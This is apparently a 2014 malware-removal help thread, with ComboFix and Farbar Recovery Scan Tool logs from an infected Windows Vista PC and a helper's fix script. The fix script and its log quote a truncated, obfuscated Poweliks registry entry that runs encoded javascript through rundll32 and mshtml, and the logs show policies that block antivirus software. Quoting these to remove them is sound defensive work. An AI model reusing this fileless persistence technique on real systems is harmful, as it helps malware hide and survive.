2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 16:05 . 2014-08-16 16:05 -------- d-----w- c:\programdata\SlimWare Utilities Inc
2014-08-16 16:04 . 2014-08-16 16:04 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-16 00:57 . 2014-08-16 16:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-16 00:56 . 2014-08-16 13:22 -------- d-----w- c:\program files\DriverUpdate
2014-08-15 17:04 . 2014-08-15 17:21 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-14 22:20 . 2014-08-14 22:20 17216 ----a-w- c:\windows\system32\drivers\GUBootStartup.sys
2014-08-14 22:19 . 2014-08-04 07:06 101664 ----a-w- c:\windows\system32\BootDefrag.exe
2014-08-14 22:19 . 2014-07-18 07:11 16064 ----a-w- c:\windows\system32\drivers\BootDefragDriver.sys
2014-08-14 22:19 . 2014-08-23 15:16 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-14 22:19 . 2014-08-14 22:19 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 22:19 . 2014-08-25 14:49 -------- d-----w- c:\program files\Glary Utilities 5
2014-08-14 01:28 . 2014-08-14 01:28 -------- d-----w- c:\program files\iPod
2014-08-14 01:28 . 2014-08-14 01:31 -------- d-----w- c:\programdata\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-14 00:53 . 2014-08-14 00:53 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin5.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin4.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin3.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin2.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin.dll
2014-08-14 00:51 . 2014-08-14 00:52 -------- d-----w- c:\program files\QuickTime
2014-08-13 01:20 . 2014-08-13 01:20 -------- d-----w- c:\programdata\WindowsSearch
2014-08-12 22:03 . 2014-08-12 22:03 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 22:02 . 2014-08-22 20:10 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\42a495
2014-08-12 21:58 . 2014-08-15 07:47 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-12 20:53 . 2014-08-23 01:40 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-12 20:51 . 2014-08-25 13:16 -------- d-----w- c:\programdata\IrfuqApivh
2014-08-12 20:33 . 2014-08-12 20:37 20480 ----a-w- c:\program files\Internet Explorer\version1.dll
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-06-17 20:17 . 2014-06-17 20:17 147736 ----a-w- c:\windows\system32\drivers\avgidshx.sys
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ehTray.exe"="c:\windows\ehome\ehTray.exe" [2008-01-21 125952]
"Akamai NetSession Interface"="c:\users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe" [2014-04-18 4672920]
"iCloudServices"="c:\program files\Common Files\Apple\Internet Services\iCloudServices.exe" [2013-10-31 59720]
"com.apple.dav.bookmarks.daemon"="c:\program files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe" [2013-10-02 59720]
"ApplePhotoStreams"="c:\program files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe" [2013-10-31 59720]
"GUDelayStartup"="c:\program files\Glary Utilities 5\StartupManager.exe" [2014-08-18 37152]
"UINoteworthy"="c:\users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll" [2014-08-20 325632]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ECenter"="c:\dell\E-Center\EULALauncher.exe" [2008-02-29 17920]
"RtHDVCpl"="RtHDVCpl.exe" [2008-03-06 4706304]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2006-11-10 90112]
"dscactivate"="c:\program files\Dell Support Center\gs_agent\custom\dsca.exe" [2008-03-11 16384]
"PCMService"="c:\program files\Dell\MediaDirect\PCMService.exe" [2008-01-14 132392]
"AppleSyncNotifier"="c:\program files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe" [2012-02-23 59240]
"HP Software Update"="c:\program files\HP\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]
"PMBVolumeWatcher"="c:\program files\Sony\PMB\PMBVolumeWatcher.exe" [2010-03-24 599328]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2011-06-15 997920]
"AVG_TRAY"="c:\program files\AVG\AVG10\avgtray.exe" [2011-09-10 2338656]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-07-31 43816]
"acevents"="c:\program files\ActivIdentity\ActivClient\acevents.exe" [2009-06-03 153640]
"accrdsub"="c:\program files\ActivIdentity\ActivClient\accrdsub.exe" [2009-06-03 400936]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2014-01-17 421888]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2014-08-01 152392]
"DameWare MRC Agent"="c:\windows\dwrcs\DWRCST.exe" [2012-11-02 379752]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"HideFastUserSwitching"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"UseDefaultTile"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ autocheck autochk * \0BootDefrag.exe\0sasnative32
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37.sys]
@=""
.
S2 ac.sharedstore;ActivIdentity Shared Store Service;c:\program files\Common Files\ActivIdentity\ac.sharedstore.exe [2009-06-03 207400]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ Pml Driver HPZ12 Net Driver HPZ12
HPService REG_MULTI_SZ HPSLPSVC
hpdevmgmt REG_MULTI_SZ hpqcxs08 hpqddsvc
LocalServiceAndNoImpersonation REG_MULTI_SZ FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2014-08-25 c:\windows\Tasks\GlaryInitialize 5.job
- c:\program files\Glary Utilities 5\Initialize.exe [2014-08-18 01:05]
.
2014-08-25 c:\windows\Tasks\RtlNICDiagVistaStart.job
- c:\program files\Realtek\RTNICDiag\RTNICDiag.exe [2008-08-06 11:44]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/
uInternet Settings,ProxyOverride = *.local;<local>
TCP: DhcpNameServer = 192.168.2.1 66.18.32.2 66.18.32.3
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2014-08-25 11:08
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-383984)
.
Completion time: 2014-08-25 11:10:46
ComboFix-quarantined-files.txt 2014-08-25 15:10
ComboFix2.txt 2014-08-24 19:45
ComboFix3.txt 2014-08-23 20:16
ComboFix4.txt 2014-08-23 18:22
.
Pre-Run: 238,789,816,320 bytes free
Post-Run: 238,726,463,488 bytes free
.
- - End Of File - - D0071B68A17A82DBD63337816FF7894D5C616939100B85E558DA92B899A0FC36
Naathim Posted August 25, 2014 ID:871102

Still no joy. I wonder if it's not a new modification.
Anyway, we need to kill Poweliks prior to other baddies, so I'm gonna focus on it now.

Fix with Farbar Recovery Scan Tool

This fix was created for this user for use on that particular machine. Running it on another one may cause damage and render the system unstable.

Press the Windows key + R on your keyboard at the same time. Type Notepad and click OK.
Copy the entire content of the codebox below and paste into the Notepad document:

start
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
CustomCLSID: HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
end

Click File, Save As and type fixlist.txt as the File Name.
Both files, FRST and fixlist.txt, have to be in the same location or the fix will not work!
Right-click on icon and select Run as Administrator to start the tool.
> XP users click run after receipt of Windows Security Warning - Open File.
> 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
Press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop, called Fixlog.txt.
Please include it in your reply.

Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool.
Right-click on icon and select Run as Administrator to start the tool.
> XP users click run after receipt of Windows Security Warning - Open File.
> 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
Make sure that Addition option is checked.
Press Scan button and wait.
The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.
Please include their content in your next reply.
jjoyner1985 Posted August 25, 2014 Author ID:871153

Fixlog

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version:23-08-2014
Ran by savas.kyriakidis at 2014-08-25 13:39:24 Run:1
Running from F:\
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
start
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
CustomCLSID: HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
end
*****************

"HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
==== End of Fixlog ====

FRST

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:23-08-2014
Ran by savas.kyriakidis (administrator) on SAVASKYRIAKI-PC on 25-08-2014 13:41:21
Running from F:\
Platform: Microsoft® Windows Vista™ Home Premium Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE
( ) C:\Windows\System32\lxblcoms.exe
() C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBDeviceInfoProvider.exe
() C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgnsx.exe
(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(CyberLink Corp.) C:\Program Files\Dell\MediaDirect\PCMService.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe
(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Apple Inc.) C:\Program Files\QuickTime\QTTask.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DellDock.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acsagent.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Glarysoft Ltd) C:\Program Files\Glary Utilities 5\Integrator.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\APSDaemon.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [ECenter] => C:\Dell\E-Center\EULALauncher.exe [17920 2008-02-29] ( )
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [4706304 2008-03-06] (Realtek Semiconductor)
HKLM\...\Run: [startCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [90112 2006-11-10] ()
HKLM\...\Run: [dscactivate] => C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe [16384 2008-03-11] ( )
HKLM\...\Run: [PCMService] => C:\Program Files\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)
HKLM\...\Run: [AppleSyncNotifier] => C:\Program Files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe [59240 2012-02-23] (Apple Inc.)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard)
HKLM\...\Run: [PMBVolumeWatcher] => C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe [599328 2010-03-24] (Sony Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [997920 2011-06-15] (Microsoft Corporation)
HKLM\...\Run: [AVG_TRAY] => C:\Program Files\AVG\AVG10\avgtray.exe [2338656 2011-09-10] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [153640 2009-06-03] (ActivIdentity)
HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [400936 2009-06-03] (ActivIdentity)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
HKLM\...\Run: [DameWare MRC Agent] => C:\Windows\dwrcs\DWRCST.exe [379752 2012-11-02] (SolarWinds)
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM\...\Policies\Explorer: [useDefaultTile] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [Akamai NetSession Interface] => C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [iCloudServices] => C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [com.apple.dav.bookmarks.daemon] => C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe [59720 2013-10-02] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ApplePhotoStreams] => C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-08-17] (Glarysoft Ltd)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [uINoteworthy] => C:\Windows\system32\rundll32.exe "C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll",DllRegisterServer <===== ATTENTION
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ActivClient Agent.lnk
ShortcutTarget: ActivClient Agent.lnk -> C:\Program Files\ActivIdentity\ActivClient\acsagent.exe (ActivIdentity)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
ShortcutTarget: Metacafe.lnk -> C:\$RECYCLE.BIN\S-1-5-21-3726736968-409882640-1958551794-1000\MetacafeAgent.exe (No File)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA1100 Smart Wizard.lnk
ShortcutTarget: NETGEAR WNA1100 Smart Wizard.lnk -> C:\Program Files\NETGEAR\WNA1100\WNA1100.exe ()
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
BootExecute: autocheck autochk * BootDefrag.exesasnative32

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xA02BBBD1D537CF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: SSVHelper Class -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: CBrowserHelperObject Object -> {CA6319C0-31B7-401E-A518-A07C3DB8F777} -> C:\Program Files\Dell\BAE\BAE.dll (Dell Inc.)
BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
DPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} http://www.winkflash.com/photo/loaders/ImageUploader5.cab
DPF: {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG10\avgpp.dll (AVG Technologies CZ, s.r.o.)
Winsock: Catalog5 01 %SystemRoot%\System32\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 66.18.32.2 66.18.32.3

FireFox:
========
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-06]
FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
FF Extension: HP Smart Web Printing - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2010-09-02]
FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG10\Firefox4
FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG10\Firefox4 [2011-07-10]
FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [icmlaeflemplmjndnaapfdbbnpncnbda] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx []

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [207400 2009-06-03] (ActivIdentity)
S3 AVG Security Toolbar Service; C:\Program Files\AVG\AVG10\Toolbar\ToolbarBroker.exe [167264 2011-11-10] ()
R2 avgfws; C:\Program Files\AVG\AVG10\avgfws.exe [2708024 2011-03-09] (AVG Technologies CZ, s.r.o.)
S2 AVGIDSAgent; C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe [7390560 2011-08-18] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG10\avgwdsvc.exe [269520 2011-02-08] (AVG Technologies CZ, s.r.o.)
